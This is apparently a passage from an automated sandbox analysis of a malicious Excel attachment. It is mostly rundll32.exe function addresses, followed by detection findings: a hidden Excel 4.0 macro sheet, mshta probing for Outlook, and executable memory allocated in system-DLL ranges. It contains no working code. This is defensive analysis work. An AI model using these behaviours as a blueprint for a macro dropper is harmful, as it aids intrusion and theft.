Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025A156 11_2_0025A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002541A7 11_2_002541A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00259186 11_2_00259186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025026B 11_2_0025026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024E243 11_2_0024E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025129C 11_2_0025129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024C309 11_2_0024C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025C38F 11_2_0025C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025B391 11_2_0025B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025D3C8 11_2_0025D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025542E 11_2_0025542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025A429 11_2_0025A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024B41A 11_2_0024B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0026146E 11_2_0026146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002504B8 11_2_002504B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025E498 11_2_0025E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002564F1 11_2_002564F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002444FA 11_2_002444FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002604DE 11_2_002604DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002574DD 11_2_002574DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00253512 11_2_00253512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024F58F 11_2_0024F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002545CD 11_2_002545CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025363D 11_2_0025363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025561F 11_2_0025561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00263672 11_2_00263672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00248650 11_2_00248650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024472E 11_2_0024472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024777B 11_2_0024777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00252753 11_2_00252753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024B821 11_2_0024B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00251831 11_2_00251831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00242830 11_2_00242830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00260867 11_2_00260867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00256864 11_2_00256864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024E86A 11_2_0024E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024C850 11_2_0024C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002488F4 11_2_002488F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025D8D7 11_2_0025D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002468DE 11_2_002468DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024F93D 11_2_0024F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00250946 11_2_00250946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024194C 11_2_0024194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00241950 11_2_00241950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025C9A9 11_2_0025C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002599AA 11_2_002599AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00261993 11_2_00261993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00246A1F 11_2_00246A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00249A7D 11_2_00249A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024CA43 11_2_0024CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024AB66 11_2_0024AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024BB4B 11_2_0024BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00261B54 11_2_00261B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00254B56 11_2_00254B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00247B82 11_2_00247B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00252BF6 11_2_00252BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025EBFF 11_2_0025EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00257BCA 11_2_00257BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00246C29 11_2_00246C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025CC89 11_2_0025CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024EC9B 11_2_0024EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025ACD3 11_2_0025ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00250D33 11_2_00250D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024BD0F 11_2_0024BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00258D71 11_2_00258D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00253D41 11_2_00253D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00260D5B 11_2_00260D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024FD8C 11_2_0024FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00248D95 11_2_00248D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025BE8C 11_2_0025BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025EE94 11_2_0025EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024AE9A 11_2_0024AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00246ED6 11_2_00246ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025FF31 11_2_0025FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00242FA1 11_2_00242FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00243FB8 11_2_00243FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00241F9B 11_2_00241F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024CFCE 11_2_0024CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E04B8 12_2_002E04B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EBE8C 12_2_002EBE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DEC9B 12_2_002DEC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EE498 12_2_002EE498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EEE94 12_2_002EEE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D70ED 12_2_002D70ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E5CF9 12_2_002E5CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E74DD 12_2_002E74DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DF93D 12_2_002DF93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D9700 12_2_002D9700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E3512 12_2_002E3512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002F1B54 12_2_002F1B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D8D95 12_2_002D8D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EB391 12_2_002EB391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E542E 12_2_002E542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D6C29 12_2_002D6C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EA429 12_2_002EA429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DB821 12_2_002DB821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E363D 12_2_002E363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D2830 12_2_002D2830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E1831 12_2_002E1831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E561F 12_2_002E561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D6A1F 12_2_002D6A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DB41A 12_2_002DB41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002F146E 12_2_002F146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E026B 12_2_002E026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DE86A 12_2_002DE86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002F0867 12_2_002F0867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E6864 12_2_002E6864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D9A7D 12_2_002D9A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002F3672 12_2_002F3672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DCA43 12_2_002DCA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E5040 12_2_002E5040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DE243 12_2_002DE243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DC850 12_2_002DC850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D8650 12_2_002D8650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002ECC89 12_2_002ECC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D6083 12_2_002D6083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E109E 12_2_002E109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E129C 12_2_002E129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DAE9A 12_2_002DAE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D44FA 12_2_002D44FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D88F4 12_2_002D88F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E64F1 12_2_002E64F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002F04DE 12_2_002F04DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D68DE 12_2_002D68DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002ED8D7 12_2_002ED8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D6ED6 12_2_002D6ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EACD3 12_2_002EACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D472E 12_2_002D472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E0D33 12_2_002E0D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EFF31 12_2_002EFF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DBD0F 12_2_002DBD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DC309 12_2_002DC309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D911A 12_2_002D911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DAB66 12_2_002DAB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D777B 12_2_002D777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E8D71 12_2_002E8D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D194C 12_2_002D194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DBB4B 12_2_002DBB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E0946 12_2_002E0946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E3D41 12_2_002E3D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002F0D5B 12_2_002F0D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EA156 12_2_002EA156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E4B56 12_2_002E4B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DF154 12_2_002DF154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D1950 12_2_002D1950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E2753 12_2_002E2753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E99AA 12_2_002E99AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EC9A9 12_2_002EC9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E41A7 12_2_002E41A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D2FA1 12_2_002D2FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D3FB8 12_2_002D3FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EC38F 12_2_002EC38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DFD8C 12_2_002DFD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DF58F 12_2_002DF58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E9186 12_2_002E9186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D7B82 12_2_002D7B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D1F9B 12_2_002D1F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002F1993 12_2_002F1993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EEBFF 12_2_002EEBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E2BF6 12_2_002E2BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E45CD 12_2_002E45CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DCFCE 12_2_002DCFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E7BCA 12_2_002E7BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002ED3C8 12_2_002ED3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00295CF9 13_2_00295CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00289700 13_2_00289700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029A429 13_2_0029A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00286C29 13_2_00286C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029542E 13_2_0029542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028B821 13_2_0028B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029363D 13_2_0029363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00291831 13_2_00291831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00282830 13_2_00282830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028B41A 13_2_0028B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029561F 13_2_0029561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00286A1F 13_2_00286A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028E86A 13_2_0028E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029026B 13_2_0029026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A146E 13_2_002A146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A0867 13_2_002A0867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00296864 13_2_00296864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00289A7D 13_2_00289A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A3672 13_2_002A3672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00295040 13_2_00295040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028CA43 13_2_0028CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028E243 13_2_0028E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028C850 13_2_0028C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00288650 13_2_00288650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002904B8 13_2_002904B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029CC89 13_2_0029CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029BE8C 13_2_0029BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00286083 13_2_00286083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029E498 13_2_0029E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028AE9A 13_2_0028AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028EC9B 13_2_0028EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029129C 13_2_0029129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029109E 13_2_0029109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029EE94 13_2_0029EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002870ED 13_2_002870ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002844FA 13_2_002844FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002964F1 13_2_002964F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002888F4 13_2_002888F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A04DE 13_2_002A04DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002974DD 13_2_002974DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002868DE 13_2_002868DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029ACD3 13_2_0029ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00286ED6 13_2_00286ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029D8D7 13_2_0029D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028472E 13_2_0028472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028F93D 13_2_0028F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029FF31 13_2_0029FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00290D33 13_2_00290D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028C309 13_2_0028C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028BD0F 13_2_0028BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028911A 13_2_0028911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00293512 13_2_00293512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028AB66 13_2_0028AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028777B 13_2_0028777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00298D71 13_2_00298D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028BB4B 13_2_0028BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028194C 13_2_0028194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00293D41 13_2_00293D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00290946 13_2_00290946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A0D5B 13_2_002A0D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00281950 13_2_00281950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00292753 13_2_00292753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028F154 13_2_0028F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A1B54 13_2_002A1B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029A156 13_2_0029A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00294B56 13_2_00294B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029C9A9 13_2_0029C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002999AA 13_2_002999AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00282FA1 13_2_00282FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002941A7 13_2_002941A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00283FB8 13_2_00283FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028FD8C 13_2_0028FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029C38F 13_2_0029C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028F58F 13_2_0028F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00287B82 13_2_00287B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00299186 13_2_00299186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00281F9B 13_2_00281F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029B391 13_2_0029B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A1993 13_2_002A1993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00288D95 13_2_00288D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029EBFF 13_2_0029EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00292BF6 13_2_00292BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029D3C8 13_2_0029D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00297BCA 13_2_00297BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002945CD 13_2_002945CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028CFCE 13_2_0028CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003204B8 15_2_003204B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0032EE94 15_2_0032EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031EC9B 15_2_0031EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0032E498 15_2_0032E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0032BE8C 15_2_0032BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00325CF9 15_2_00325CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003170ED 15_2_003170ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003274DD 15_2_003274DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031F93D 15_2_0031F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00323512 15_2_00323512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00319700 15_2_00319700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00331B54 15_2_00331B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0032B391 15_2_0032B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00318D95 15_2_00318D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00312830 15_2_00312830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00321831 15_2_00321831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0032363D 15_2_0032363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031B821 15_2_0031B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00316C29 15_2_00316C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0032A429 15_2_0032A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0032542E 15_2_0032542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031B41A 15_2_0031B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0032561F 15_2_0032561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00316A1F 15_2_00316A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00333672 15_2_00333672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00319A7D 15_2_00319A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00330867 15_2_00330867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00326864 15_2_00326864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0032026B 15_2_0032026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031E86A 15_2_0031E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0033146E 15_2_0033146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031C850 15_2_0031C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00318650 15_2_00318650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031CA43 15_2_0031CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00325040 15_2_00325040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031E243 15_2_0031E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031AE9A 15_2_0031AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0032109E 15_2_0032109E
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 3F51.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: Attachment-2801.xls Macro extractor: Sheet name: Macro2
Source: Attachment-2801.xls Macro extractor: Sheet name: Macro2
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
